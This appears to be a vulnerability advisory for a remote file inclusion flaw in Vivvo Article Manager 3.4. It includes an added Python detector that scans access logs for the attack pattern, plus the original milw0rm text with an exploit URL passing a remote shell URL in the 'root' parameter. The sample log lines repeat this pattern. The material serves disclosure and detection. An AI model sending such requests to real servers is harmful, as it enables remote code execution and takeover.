Vendor: Vivvo Article Manager
By: Snip0r
CVSS: 7.5 (HIGH)
Remote Code Execution
CWE
Product Name: Vivvo Article Manager
Affected Version From: Vivvo Article Manager v 3.4
Affected Version To: Vivvo Article Manager v 3.4
Patch Exists: NO
2007

Vivvo Article Manager v 3.4 Remote Code Execution

Vivvo Article Manager v 3.4 is vulnerable to remote code execution through the './include/db_conn.php' script, which includes a file from a path that a request can influence. An attacker who appends a specially crafted 'root' URL parameter containing a shell URL can make the server execute arbitrary code.

Mitigation:

Update to a patched version of Vivvo Article Manager. Apply necessary security measures like input validation and sanitization to prevent remote code execution.
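
For detection, the following added example (not part of the original advisory or of Vivvo's code) scans web server access logs for the request pattern described above: a request to include/db_conn.php whose 'root' parameter carries a URL instead of a local path. The combined log format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Script and parameter named in the advisory.
SCRIPT_SUFFIX = "/include/db_conn.php"
PARAM = "root"
# A leading scheme ("http:", "ftp:", "php:", ...), "//" or "\\" marks a value
# that is not a plain relative path inside the application.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)


def remote_root_value(target):
    """Return the decoded 'root' value if the target matches the pattern, else None."""
    parts = urlsplit(target)
    # Decode the path once, as the web server does, then compare case-insensitively.
    if not unquote(parts.path).lower().endswith(SCRIPT_SUFFIX):
        return None
    # parse_qsl percent-decodes each value once, which is what PHP would see.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, client_ip, root_value) for every matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        value = remote_root_value(match.group(1)) if match else None
        if value is not None:
            hits.append((number, line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Feb/2007:10:01:02 +0000] "GET /news/include/db_conn.php?root=http://example.invalid/s.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/Feb/2007:10:01:09 +0000] "GET /news/include/db_conn.php?root=hTTp%3A%2F%2Fexample.invalid%2Fs.txt%3F HTTP/1.1" 200 512',
    '203.0.113.5 - - [16/Feb/2007:10:02:00 +0000] "GET /news/index.php?root=http://example.invalid/ HTTP/1.1" 200 9000',
    '203.0.113.5 - - [16/Feb/2007:10:02:30 +0000] "GET /news/include/db_conn.php?root=lang/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the first two sample lines are reported: the third targets a different script and the fourth passes a relative path with no scheme.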
Source

Exploit-DB raw data:

===================================================================================================
Author: Snip0r
Script Name: Vivvo Article Manager v 3.4
Website: www.vivvo.net
===================================================================================================
Code snippet of vulnerable script ("./include/db_conn.php"):

if (file_exists($ext_base_conf_file)) include_once($ext_base_conf_file);
===================================================================================================
Exploit:

http://victim.com/ [Vivvo Article Manager Path] / include / db_conn.php?root=[SHELL_URL]?
===================================================================================================
Greets fly out to: D-T-O, Blutkehle666,Chris,Doc,Legija0ne,Higgy,Anthra><,Basti and bi0
=================================================================================================== 

# milw0rm.com [2007-02-16]